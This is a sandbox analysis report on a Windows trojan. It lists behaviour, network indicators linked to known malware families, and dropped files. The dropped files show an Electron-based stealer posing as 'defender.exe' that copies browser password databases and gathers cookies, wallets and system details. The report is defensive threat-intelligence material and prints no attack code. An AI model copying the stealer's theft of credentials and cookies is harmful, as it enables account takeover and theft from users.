Overall analysis duration:0h 9m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:34
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Detection:MAL
Classification:mal60.spyw.winEXE@29/139@9/7
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 4
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.65.195, 142.251.32.99
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Simulations

Behavior and APIs

TimeTypeDescription
11:35:00API Interceptor11x Sleep call for process: powershell.exe modified
11:36:00API Interceptor281x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
162.159.61.3sorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
    random.exeGet hashmaliciousBabadedaBrowse
      jp95FFMUoh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
        random.exeGet hashmaliciousBabadedaBrowse
          sorto.exeGet hashmaliciousAmadey, Babadeda, StealcBrowse
            random.exeGet hashmaliciousBabadedaBrowse
              #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                PDFpower (1).exeGet hashmaliciousUnknownBrowse
                  setup.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    SecuriteInfo.com.decompression.bomb.32349.22015.exeGet hashmaliciousUnknownBrowse
                      99.81.234.0https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                        52.48.38.99https://helpcenter.d1684u00tkwyh2.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                          https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                            172.64.41.3sorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                              random.exeGet hashmaliciousBabadedaBrowse
                                jp95FFMUoh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                  random.exeGet hashmaliciousBabadedaBrowse
                                    sorto.exeGet hashmaliciousAmadey, Babadeda, StealcBrowse
                                      random.exeGet hashmaliciousBabadedaBrowse
                                        #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                          PDFpower (1).exeGet hashmaliciousUnknownBrowse
                                            setup.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                              SecuriteInfo.com.decompression.bomb.32349.22015.exeGet hashmaliciousUnknownBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.comhttps://www.notism.io/-/716602fa429d680becc7a0edbGet hashmaliciousUnknownBrowse
                                                • 18.211.209.94
                                                original.emlGet hashmaliciousUnknownBrowse
                                                • 44.215.242.31
                                                RFQ Webcor Construction MV23932.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 44.205.90.123
                                                https://www.ticketlike.fun/Get hashmaliciousUnknownBrowse
                                                • 44.205.90.123
                                                QmbMNrVEEND8h5YxGjfffD2Njdy7gy2PWGmtq67UAYmiWu.htmlGet hashmaliciousUnknownBrowse
                                                • 54.85.25.116
                                                https://serviciomacpcexpress.info/wp-includes/irz/Get hashmaliciousPhisherBrowse
                                                • 23.21.153.157
                                                https://u9132105.ct.sendgrid.net/ls/click?upn=1I1mRSxHmNOlE22wVd-2F6i-2BT2bfJpsViD0CikMXRD0MVAri-2BQwdecKhyiJmj97khpO4527GfxFS6h7Y97sR0-2BDGlKEAaQKyABmRDHLN-2B7sbuUh3qilKWBJCzp0w2BmXSxsRLqJ6hg4c2eOdc4SRAT6g-3D-3DoOZr_TUhSZDGzBLgvInB14AqJEdiNMQts-2BR5M9ngIQkhoN3GSq3dNkEAz-2FRz5KQd4vx86Rgfmm-2B4rYbnEPom-2Bt-2F7WSpl798FTYEYEoeFf60PW0v5UXvQmWq4w3AfmFVjTDM-2FlsB3hhT9vPMcYFEi6vOfRl8t18gLlUaIpnonIIfced4Yp-2FPd2sU9h5iIHkEFJmCInOcF5lJTxKBG92zkbdVv7Ag-3D-3DGet hashmaliciousUnknownBrowse
                                                • 54.175.206.14
                                                https://spaces.hightail.com/receive/Z4BNlNUQd3/dXMtOThkYmJlNjktYjQ2MC00NWQ0LTgxODAtZTAyMmRhNGJkNmM3Get hashmaliciousHTMLPhisherBrowse
                                                • 52.203.75.153
                                                https://www.cakeresume.com/s--MSKY6gJBRd9r9FzWxIaHag--/paula-barataGet hashmaliciousUnknownBrowse
                                                • 54.243.70.123
                                                http://applecreekkingsville.comGet hashmaliciousUnknownBrowse
                                                • 3.229.47.106
                                                socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.comhttps://helpcenter.d1684u00tkwyh2.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                                                • 34.253.251.171
                                                https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                                                • 34.240.119.52
                                                https://account.booking-sign.com/sign-in?op_token=Y5VK0mvaMy3A7BhJGet hashmaliciousUnknownBrowse
                                                • 52.19.171.61
                                                https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/Get hashmaliciousUnknownBrowse
                                                • 54.76.231.252
                                                chrome.cloudflare-dns.comsorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 162.159.61.3
                                                random.exeGet hashmaliciousBabadedaBrowse
                                                • 172.64.41.3
                                                jp95FFMUoh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 162.159.61.3
                                                random.exeGet hashmaliciousBabadedaBrowse
                                                • 162.159.61.3
                                                sorto.exeGet hashmaliciousAmadey, Babadeda, StealcBrowse
                                                • 162.159.61.3
                                                random.exeGet hashmaliciousBabadedaBrowse
                                                • 162.159.61.3
                                                #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                • 162.159.61.3
                                                PDFpower (1).exeGet hashmaliciousUnknownBrowse
                                                • 172.64.41.3
                                                setup.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 162.159.61.3
                                                SecuriteInfo.com.decompression.bomb.32349.22015.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.61.3
                                                ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comhttps://helpcenter.d1684u00tkwyh2.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                                                • 52.48.38.99
                                                https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/Get hashmaliciousUnknownBrowse
                                                • 52.48.38.99
                                                https://account.booking-sign.com/sign-in?op_token=Y5VK0mvaMy3A7BhJGet hashmaliciousUnknownBrowse
                                                • 54.216.83.132

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AMAZON-02USsorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 108.156.60.6
                                                random.exeGet hashmaliciousBabadedaBrowse
                                                • 52.222.236.80
                                                arm4.elfGet hashmaliciousUnknownBrowse
                                                • 34.249.145.219
                                                Urq5Bp4bgs.elfGet hashmaliciousUnknownBrowse
                                                • 13.244.111.254
                                                6PXS8SZtD8.exeGet hashmaliciousAsyncRATBrowse
                                                • 3.140.223.7
                                                w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                                                • 52.29.131.233
                                                w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                                                • 52.29.131.233
                                                Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                • 35.157.63.229
                                                SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exeGet hashmaliciousPureLog StealerBrowse
                                                • 99.84.208.6
                                                SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exeGet hashmaliciousPureLog StealerBrowse
                                                • 13.224.189.18
                                                AMAZON-02USsorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 108.156.60.6
                                                random.exeGet hashmaliciousBabadedaBrowse
                                                • 52.222.236.80
                                                arm4.elfGet hashmaliciousUnknownBrowse
                                                • 34.249.145.219
                                                Urq5Bp4bgs.elfGet hashmaliciousUnknownBrowse
                                                • 13.244.111.254
                                                6PXS8SZtD8.exeGet hashmaliciousAsyncRATBrowse
                                                • 3.140.223.7
                                                w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                                                • 52.29.131.233
                                                w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                                                • 52.29.131.233
                                                Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                • 35.157.63.229
                                                SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exeGet hashmaliciousPureLog StealerBrowse
                                                • 99.84.208.6
                                                SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exeGet hashmaliciousPureLog StealerBrowse
                                                • 13.224.189.18
                                                AMAZON-AESUSw859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                                                • 107.23.203.25
                                                w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                                                • 34.194.105.96
                                                wKrQaAEaJ4.elfGet hashmaliciousMiraiBrowse
                                                • 18.233.39.244
                                                https://jon0472sbcglobalne.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                                • 44.219.134.238
                                                https://16784846511.cloud/Get hashmaliciousUnknownBrowse
                                                • 3.208.56.98
                                                http://cdn.amxprd.com/en-us/business/checking/get-started/using-your-business-debit-cardGet hashmaliciousUnknownBrowse
                                                • 54.234.53.240
                                                okZYzMZtnk.elfGet hashmaliciousMiraiBrowse
                                                • 54.8.106.132
                                                Tn08qpE9Le.elfGet hashmaliciousMiraiBrowse
                                                • 52.22.221.203
                                                xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 54.22.37.227
                                                xd.arm.elfGet hashmaliciousMiraiBrowse
                                                • 18.208.42.28
                                                CLOUDFLARENETUSsorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 172.64.41.3
                                                random.exeGet hashmaliciousBabadedaBrowse
                                                • 172.64.41.3
                                                Microsoft 3D.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                                • 104.21.80.78
                                                eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                • 172.67.196.114
                                                Urq5Bp4bgs.elfGet hashmaliciousUnknownBrowse
                                                • 1.15.163.159
                                                Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                • 188.114.97.3
                                                vercath63.b-cdn.ps1Get hashmaliciousLummaC, Go InjectorBrowse
                                                • 172.67.175.230
                                                Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                • 188.114.96.3
                                                Bank slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                2.bin.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                • 188.114.96.3

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dllSecuriteInfo.com.Win64.Malware-gen.19582.16146.exeGet hashmaliciousUnknownBrowse
                                                  SecuriteInfo.com.Win64.Malware-gen.19582.16146.exeGet hashmaliciousUnknownBrowse
                                                    Installer Setup 9.7.0.exeGet hashmaliciousUnknownBrowse
                                                      Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                        lookworldafs1244.msiGet hashmaliciousUnknownBrowse
                                                          node.js.exeGet hashmaliciousUnknownBrowse
                                                            node.js.exeGet hashmaliciousUnknownBrowse
                                                              LeqO0KJkDX.exeGet hashmaliciousUnknownBrowse
                                                                LeqO0KJkDX.exeGet hashmaliciousUnknownBrowse
                                                                  etnY4xJd3y.exeGet hashmaliciousUnknownBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:true
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:true
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1148
                                                                    Entropy (8bit):5.325653416532896
                                                                    Encrypted:false
                                                                    SSDEEP:24:3ZDl1SKco4KmZjKbm51s4RPT6moUe7u1o+m9qr9t7J0gt/NKIl9r8Hq:Rl1SU4xymI4RfoUeCa+m9qr9tK8NDd
                                                                    MD5:7908846B9139193DC5839557F5141820
                                                                    SHA1:5E323E96CCFFFE7877AC8A4373EED123248DEF10
                                                                    SHA-256:9451395F4CE12CB0E99E1245F940DF334DF979DD2E5CD890152964272E3ECD2E
                                                                    SHA-512:BB04477250275B2C906909C445CD37582F36E785ED5C643CABD83297220F1EA0C098B88D7FB3BA932AE96391BEAE5083834C05DFD25F7E42609A8C33A3721F9A
                                                                    Malicious:false
                                                                    Preview:@...e.................................o..............@..........8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e.zip

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):206
                                                                    Entropy (8bit):3.162089689334548
                                                                    Encrypted:false
                                                                    SSDEEP:3:vhjP6qv9lojm9P6qv9l30uEtiqv9l4X9mmNtiqv9l4DlllZJ0uS/9lnllln:5jSr0SC5NxQnxD/3J5iN
                                                                    MD5:F7842725DA4E0441082E93E77CE00940
                                                                    SHA1:BF98630287DAB5983CCF2400A557BFFB18FF96B8
                                                                    SHA-256:A01FBEEC5FBB034E813729D3612E6543A5C08194AF636B651E627887B07FD7C0
                                                                    SHA-512:9C5C33CCB2DDF387BDB4F43C0133ABE18C327761577294AF5017698E08DEB65F8368C9CBE71E77CC7D3D1962463839BB915B8B8ADEADA0C8C7BA89379F5455DC
                                                                    Malicious:false
                                                                    Preview:PK........g\.Y................Cookies/PK........g\.Y................Wallets/PK..........g\.Y.........................A....Cookies/PK..........g\.Y.........................A&...Wallets/PK..........l...L.....

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Autofills.txt

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):77
                                                                    Entropy (8bit):3.40147237857684
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrVr1w+EKcJW5KeBF3R3AV:pTEKcY5JFh3AV
                                                                    MD5:9B9B390AE47ABBA2CBCCA9D4DF3B0DCF
                                                                    SHA1:4387B1DD7C425EA81B36AF6805010C4EBA6C8C5F
                                                                    SHA-256:01266BD91CF7AC9D02A71FEB95A40D9CD4DA5C977364B2CE7736A0FE78F24259
                                                                    SHA-512:8ED8B7A8FE58C5353E428780ADCC20769E771A7256D3E08C11F43D6099B71489668FEF88E5F6033140315C40A70F19BFB11D0AB3F474F980BBB942F8DD5AAC60
                                                                    Malicious:false
                                                                    Preview:<================[]>================>..No autofills found for Google Default.

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Cookies\Google_Default.txt

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):275
                                                                    Entropy (8bit):5.886485844013828
                                                                    Encrypted:false
                                                                    SSDEEP:6:Pk3rocHDyzxb6k3rocHDKJsXfaaW3UnhzrWgOsH6/8hwDFI0BFOqvu:c79EYk79xva3UhyL/8ObWv
                                                                    MD5:41147EE4DC55735ECDD0375BC242A40D
                                                                    SHA1:2141BEC34CBDBCD41B913A6FAE7376390141CF5B
                                                                    SHA-256:2C9B11ADC2B002FDB9DFD967EA553480828D7C8D04BDB8EB03D78061E4771E53
                                                                    SHA-512:07A5BB3CB2B83724C804AB1E4D17DD219B0378C3905D63E492DAC732B2346DCCED186443E992BD918DCD5161121726B54D68B031F7912B8FE37C651A62B66C44
                                                                    Malicious:false
                                                                    Preview:.google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-07 ..google.com.TRUE./.FALSE.2597573456.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA .

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\Passwords.txt

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):19
                                                                    Entropy (8bit):3.536886723742169
                                                                    Encrypted:false
                                                                    SSDEEP:3:eNKXBmLn:oKXsLn
                                                                    MD5:C4EFD9A7B61EBF43B608440BE5E33369
                                                                    SHA1:926418256C277F1B11B575EC6E92CE6A844612F7
                                                                    SHA-256:ED4280859199DA5A8F25C0C6D533D0873460AC63368C14A69BBD863EA4BFB30F
                                                                    SHA-512:9EA97363868D61D3D51BD3804D638B71BA8DC65260800B3A54051B4725CF08E9D9880A12422A549D94A339C7267E858A7FF5CA9428D64051657134B5C6C20745
                                                                    Malicious:false
                                                                    Preview:No passwords found.

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\672e2c2b3206cc57c836d5e96ea2e71e\user.txt

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):605
                                                                    Entropy (8bit):5.230143074410793
                                                                    Encrypted:false
                                                                    SSDEEP:12:YJJZ7DGHkBDc3DF3xZAppqkDoagjxfex5/0LBe6jQkd682hoL:YJJZrBQ/qpqk8agjxfex5/0lrUkdAaL
                                                                    MD5:BE04BC9DF31E3485821D3B42ADD50526
                                                                    SHA1:2191CF0FA2CB22842E80F39B6C555CC6E42590DD
                                                                    SHA-256:2C9FDAD340830FB47CF5750CC0CC5B984D3FD855824AC19E489852BFC6C93334
                                                                    SHA-512:E9B3511B920F2599A185BC4809F3EBF5828704686C25C74682B33CBA544EF6D8EB419A80BABE9F59F5FB8414805D3ADB36B1B5FA913A7A1AD89A7DDAE58AE114
                                                                    Malicious:false
                                                                    Preview:{"ram":8589148160,"version":"Windows 10 Pro","homedir":"C:\\Users\\user","hostname":"841675","userInfo":"user","type":"Windows_NT","arch":"x64","release":"10.0.19045","roaming":"C:\\Users\\user\\AppData\\Roaming","local":"C:\\Users\\user\\AppData\\Local","temp":"C:\\Users\\user~1\\AppData\\Local\\Temp","countCore":"2","sysDrive":"C:","fileLoc":"C:\\Users\\user~1\\AppData\\Local\\Temp\\2goCimWNF4MQsElUG17heiczRtP","randomUUID":"6b777e561599d00cd9121851ee4fe177","start":1722785716103,"debug":false,"copyright":"<================[Fewer Stealer]>================>\n\n","url":null}

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\LICENSE.electron.txt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1096
                                                                    Entropy (8bit):5.13006727705212
                                                                    Encrypted:false
                                                                    SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                    MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                    SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                    SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                    SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                    Malicious:false
                                                                    Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\LICENSES.chromium.html

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):6766160
                                                                    Entropy (8bit):4.735324161006094
                                                                    Encrypted:false
                                                                    SSDEEP:24576:d7rs5kjWSnB3lWNeUmf0f6W6M6q6A6r/HXpErpem:rovj
                                                                    MD5:180F8ACC70405077BADC751453D13625
                                                                    SHA1:35DC54ACAD60A98AEEC47C7ADE3E6A8C81F06883
                                                                    SHA-256:0BFA9A636E722107B6192FF35C365D963A54E1DE8A09C8157680E8D0FBBFBA1C
